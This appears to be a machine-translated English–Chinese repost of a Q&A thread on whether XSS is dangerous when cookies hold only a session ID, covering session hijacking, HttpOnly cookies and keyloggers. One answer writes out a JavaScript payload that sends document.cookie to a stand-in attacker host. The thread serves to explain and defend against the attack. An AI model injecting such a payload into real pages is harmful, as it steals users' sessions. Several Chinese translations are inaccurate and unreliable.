即使Cookie不存储用户凭据,XSS还是危险的吗?
[英]Is XSS dangerous even if the cookie doesn't store user credentials?
问题描述
Whenever someone talks about the dangers of xss, they mention that the 'bad guys' can get access to user credentials. 
每当有人谈论xss的危险时,他们都会提到“坏人”可以访问用户凭据。 But if I only store a session id on the cookie, and authenticate the user based on the session id, are there any other ways xss can be used to access user credentials? 但是,如果我仅将会话ID存储在Cookie上,并根据会话ID对用户进行身份验证,那么还有其他方法可以使用xss访问用户凭据吗?
3 个解决方案
解决方案1
1 已采纳 2014-05-29 17:14:03
Yes. 是。
XSS means a foreign or malicious script is running on the page. XSS表示页面上正在运行外部脚本或恶意脚本。 There are a bunch of ways this could be dangerous. 有很多方法可能会很危险。
Session Hijacking 会话劫持
Even if the cookie doesn't store user credentials (and it shouldn't). 即使cookie不存储用户凭据(也不应该)。 It stores enough information for the server to consider the bearer of the cookie to be a particular user (HTTP is stateless so we use cookies/sessions to remember users). 它存储了足够的信息供服务器将cookie的承载者视为特定用户(HTTP是无状态的,因此我们使用cookie /会话来记住用户)。
So if someone steals the session ID they can use it to impersonate you and the server might be none the wiser. 因此,如果有人窃取了会话ID,则他们可以使用它来假冒您,而服务器可能更不明智。
Safeguarding with IP 知识产权保护
In your original question you asked about another level of security: verifying the IP address tied to the session. 在最初的问题中,您询问了另一种安全级别:验证与会话绑定的IP地址。 Yes, that cuts down the attack avenue. 是的,这减少了攻击途径。 Yes, IP addresses can be faked. 是的,IP地址可以被伪造。 But you're no longer the lowest hanging fruit for attackers. 但是,对于攻击者而言,您不再是悬念最低的果实。 At the same time security and convenience are opposites so your legitimate users might be frustrated that when their IP address changes they are no longer signed in. 同时,安全性和便利性是对立的,因此您的合法用户可能会因为IP地址更改而不再登录而感到沮丧。
Other attacks 其他攻击
Stealing the cookie/session is one easy way to gain access but not the only one. 窃取cookie /会话是获得访问权限的一种简单方法,但不是唯一的方法。
Since a script is running (supposedly) from the trusted site and from the user's browser. 由于脚本正在(据说)正在从受信任的站点和用户的浏览器运行。 It could to a lot of things: 它可能对很多事情有影响:
- loads an invisible iframe for the account edit page and resets the password/email for the user 为帐户编辑页面加载不可见的iframe,并为用户重置密码/电子邮件
- load a keylogger, show the user the login page 加载键盘记录器,向用户显示登录页面
解决方案2
1 2014-05-30 07:59:38
Unless the Session ID cookie is marked as HTTP Only , the session can still be hijacked using XSS . 除非会话ID cookie标记为“ 仅HTTP” ,否则仍可以使用XSS劫持会话。
eg 例如
new Image().src = 'http://www.example.com/?cookie=' + escape(document.cookie);
will send the Session ID to the attackers domain ( www.example.com ) where they will be able to set their own cookie to the same Session ID and steal the session. 会将会话ID发送到攻击者域( www.example.com ),在那里他们可以将自己的cookie设置为相同的会话ID并窃取该会话。
Even without the cookie risk, as the attacker can inject whatever they like into the page, they could alter any page content or install key loggers in the browser session. 即使没有cookie风险,由于攻击者可以将任意内容注入页面,因此他们可以更改任何页面内容或在浏览器会话中安装按键记录器。
解决方案3
0 2014-05-30 00:46:15
I recently went to a talk that described ways to trick a password manager into filling out a password form, provided that the attacker could use XSS to modify pages on the victim site. 我最近参加了一个演讲,描述了诱使密码管理器填写密码表单的方法,只要攻击者可以使用XSS修改受害站点上的页面。 That's one way an attacker might be able to access user credentials. 这是攻击者可能访问用户凭据的一种方式。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.